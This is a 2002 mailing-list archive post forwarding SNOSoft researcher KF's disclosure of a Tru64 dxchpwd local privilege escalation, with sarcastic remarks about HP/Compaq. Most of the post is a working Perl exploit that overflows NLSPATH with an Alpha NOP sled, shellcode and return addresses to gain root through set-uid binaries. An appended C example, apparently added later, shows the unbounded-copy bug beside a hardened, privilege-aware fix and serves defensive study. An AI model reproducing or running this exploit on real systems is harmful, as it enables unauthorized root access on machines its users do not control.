[Fwd: In regards to ... http://online.securityfocus.com/bid/5382]

From: Blue Boar (BlueBoarat_private)
Date: Mon Aug 05 2002 - 10:48:01 PDT


    ----- Original Message -----
    From: KF <dotslashat_private>
    To: bugtraqat_private
    Cc: full-disclosureat_private ; vuln-devat_private
    Sent: Monday, August 05, 2002 12:22 PM
    Subject: [Full-Disclosure] In regards to ...
    http://online.securityfocus.com/bid/5382
    
    In regards to ... http://online.securityfocus.com/bid/5382 and
    http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README
    
    - SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium)  why medium? Because
    the public had not seen an exploit?
    
    This ECO has not been through an exhaustive field test process.
    Due to the experimental stage of this ECO/workaround, Hewlett-Packard
    makes no representations regarding its use or performance. The
    customer shall have the sole responsibility for adequate protection
    and back-up data used in conjunction with this ECO/workaround.
    ^--- hrmm cute.
    
    I think I can make one of those right quick too.
    
    This SNOSoft Proof of Concept Tool has not been through an exhaustive
    field test process. Due to the experimental stage of this Tool, SNOSoft
    makes no representations regarding its use or performance. The
    customer of Compaq / HP shall have the sole responsibility for adequate
    protection and back-up data used in conjunction with his or her own
    system and the use of the following SNO/Proof of Concept Tool.
    
    Official SNO workaround is:
    See vendor or if paranoid chmod -s everything in sight.
    
    This is supposed to be the vendor fix... I have not tested it. I assume,
    with the coordination from CERT and the conscious decision to release a
    public patch, that the vendor has provided a good workaround.
    
    http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README
    
    Please note, after all the public drama with HP, look whose name ends up
    in the credit section. *grin*
    Good find guys... let's give the HP dev staff a round of applause. *sarcasm*
    
    Tru64 DXCHPWD Local Privilege Escalation Vulnerability
    Credit:
                 Published in a Compaq security advisory.
    
    
    Hrmm how nice of them to mention us.
    I will give someone a cookie if they can tell me when NLSPATH was first
    a big issue on OTHER unix systems.
    
    I hope this isn't broken... if it is don't whine to me ... fix it.
    
    --- begin copyrighted material
    
    #!/usr/bin/perl -w
    #
    # stripey (stripeyat_private)
    #
    # This code is copyrighted by Snosoft
    # http://www.snosoft.com
    # If you are a direct employee of HP or Compaq
    # you are not allowed to look at this program or use it.
    # In order to protect our copyright on this
    # program we have crippled it (at least) by adding
    # _IWORKATHP to some part of the code. If
    # you do not work for HP or Compaq you may
    # remove these letters at will provided this copyright notice
    # remains attached to the header of this code.
    # As stated above if you work at HP you should
    # not even be reading at this point. However if
    # you are please note that by removing the letters
    # _IWORKATHP from this document you are violating
    # the DMCA section 1201(a)
    
    # Also Please note that most of the targets in
    # this are removed pending CERT releases.

    # Each target is "<32-bit return address>:<set-uid binary>"; the
    # address is the low word of the 64-bit pointer assembled in $ret below.
    $tgts{"0"} = pack("l",0x40010c04).":/usr/dt/bin/SORRY";
    $tgts{"1"} = pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";
    $tgts{"2"} = pack("l",0x40014280).":/usr/sbin/HRMMM";
    $tgts{"3"} = pack("l",0x4003c190).":/usr/bin/LALALALAL";
    $tgts{"4"} = pack("l",0x400361f0).":/usr/bin/HARHAR";
    $tgts{"5"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";
    $tgts{"6"} = pack("l",0x400120b0).":/usr/bin/OOPS";
    $tgts{"7"} = pack("l",0x400105e8).":/usr/bin/DECLANR0X";
    
    unless (($target,$offset,$align) = @ARGV,$align) {
    
             print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
    
             foreach $key (sort(keys %tgts)) {
                     ($a,$b) = split(/\:/,$tgts{"$key"});
                     print "\t$key. $b\n";
             }
    
             print "\n";
    
             exit 1;
    }
    
    ($a,$b) = split(/\:/,$tgts{"$target"});
    
    print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";

    # Return address as a 64-bit Alpha pointer: target address plus offset
    # in the low 32-bit word, 0x1 in the high word (i.e. 0x1XXXXXXXX).
    $ret = pack("ll",(unpack("l",$a)+$offset), 0x1);

    # GOBBLES someday I will switch gears in the sweat shop and
    # get that shellcode written up. That was quite the entertaining
    # talk or speech or whatever this weekend.
    
    # shellcode by Taeho Oh
    
    $sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
    $sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
    $sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
    $sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
    $sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
    $sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
    $sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
    $sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
    $sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
    $sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
    
    # Payload layout: $align bytes of padding, then a sled of Alpha NOPs
    # (0x47ff041f = bis $31,$31,$31) sized so sled plus shellcode come to
    # just under 1024 bytes, then the 8-byte return address. The whole
    # buffer is handed to the set-uid target through NLSPATH.
    $tlen = (1024-(length($sc)))/4;
    $buf .= "B"x$align;
    $buf .= pack("l",0x47ff041f)x($tlen-1);
    $buf .= $sc;
    $buf .= $ret;

    $ENV{"NLSPATH"} = $buf;
    
    if ($target == 7) { print "Hit ctrl-d...\n"; }
    
    if ($target == 6) {
             exec("$b","-d","a=asdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");
    } else {
             exec("$b");
    }
    
    ---- end copyrighted material
    
    -KF
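
The bug class behind this advisory, as an added example that is not part of KF's post or of any Compaq/HP code: a message-catalog path resolver that copies NLSPATH into a fixed 1024-byte buffer, beside a hardened version that bounds the copy and, more importantly, ignores NLSPATH entirely when the process runs set-uid or set-gid (real id != effective id), which is the check a set-uid binary like dxchpwd needs regardless of buffer handling. CAT_PATH_MAX, DEFAULT_NLSPATH and every function name here are assumptions for illustration; only the %N (catalog name) substitution is modelled, and the real Tru64 libc internals are not shown on the page.

```c
/* Added example, not from the original post: the pattern an NLSPATH
 * overflow depends on, beside a hardened resolver.  CAT_PATH_MAX,
 * DEFAULT_NLSPATH and all function names are assumptions; only %N is handled. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CAT_PATH_MAX    1024                  /* assumed fixed buffer size */
#define DEFAULT_NLSPATH "/usr/lib/nls/msg/%N" /* assumed built-in default */

/* Vulnerable pattern: the template is copied into a fixed-size buffer with no
 * length check.  An NLSPATH of ~1024 bytes of padding, shellcode and a return
 * address (the layout the Perl above builds) runs straight past `buf`.
 * Kept for contrast only; never feed it untrusted input. */
void expand_unsafe(const char *tpl, const char *name, char *buf)
{
    char *p = buf;
    for (const char *s = tpl; *s; s++) {
        if (s[0] == '%' && s[1] == 'N') { strcpy(p, name); p += strlen(name); s++; }
        else *p++ = *s;
    }
    *p = '\0';
}

/* Bounded expansion: 0 on success, -1 if the result (plus NUL) would not
 * fit.  Nothing is ever written past buf[bufsz - 1]. */
int expand_safe(const char *tpl, const char *name, char *buf, size_t bufsz)
{
    size_t used = 0;
    if (bufsz == 0) return -1;
    for (const char *s = tpl; *s; s++) {
        const char *piece = s;
        size_t n = 1;
        if (s[0] == '%' && s[1] == 'N') { piece = name; n = strlen(name); s++; }
        if (n >= bufsz - used)    /* would overflow, or leave no room for NUL */
            return -1;
        memcpy(buf + used, piece, n);
        used += n;
    }
    buf[used] = '\0';
    return 0;
}

/* Whether NLSPATH may be honoured at all.  `privileged` should be
 *   getuid() != geteuid() || getgid() != getegid()
 * i.e. a set-uid/set-gid program whose environment came from an unprivileged
 * caller; then the built-in default wins.  Non-absolute templates are rejected too. */
const char *choose_template(const char *env_nlspath, int privileged)
{
    if (privileged || env_nlspath == NULL || env_nlspath[0] != '/')
        return DEFAULT_NLSPATH;
    return env_nlspath;
}

/* Resolve the catalog path for `name`; falls back to the default (rather
 * than truncating) when the user template is too long.  0 on success. */
int catalog_path(const char *env_nlspath, const char *name, int privileged,
                 char *out, size_t outsz)
{
    if (expand_safe(choose_template(env_nlspath, privileged), name, out, outsz) == 0)
        return 0;
    return expand_safe(DEFAULT_NLSPATH, name, out, outsz);
}

/* Builds "/AAA...A%N" with n bytes before the %N, like the exploit's padding;
 * static storage so callers need not free it (constructed test input). */
const char *long_template(size_t n)
{
    static char big[4096];
    if (n > sizeof big - 3) n = sizeof big - 3;
    memset(big, 'A', n);
    big[0] = '/';
    memcpy(big + n, "%N", 3);
    return big;
}

/* Result-returning wrappers so behaviour can be checked without caller buffers. */
int resolves_to(const char *env, const char *name, int priv, const char *want)
{
    char out[CAT_PATH_MAX];
    return catalog_path(env, name, priv, out, sizeof out) == 0 && strcmp(out, want) == 0;
}

int safe_expand_fits(const char *tpl, const char *name)
{
    char out[CAT_PATH_MAX];
    return expand_safe(tpl, name, out, sizeof out) == 0;
}

int main(void)
{
    char out[CAT_PATH_MAX];
    int privileged = getuid() != geteuid() || getgid() != getegid();
    catalog_path(getenv("NLSPATH"), "dxchpwd.cat", privileged, out, sizeof out);
    printf("catalog path: %s\n", out);
    printf("1200-byte template fits: %s\n", safe_expand_fits(long_template(1200), "x") ? "yes" : "no");
    return 0;
}
```

Build and run with something like `cc -Wall nlspath_demo.c -o nlspath_demo && NLSPATH='/tmp/x/%N' ./nlspath_demo` (file name assumed). Run normally it prints `/tmp/x/dxchpwd.cat`; run as a set-uid binary the same input prints the default path, because `privileged` is set and the environment is never consulted. The bounds check alone would only have turned the overflow into a truncated path, which is why the credential check comes first.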
    

    This archive was generated by hypermail 2b30 : Mon Aug 05 2002 - 10:48:41 PDT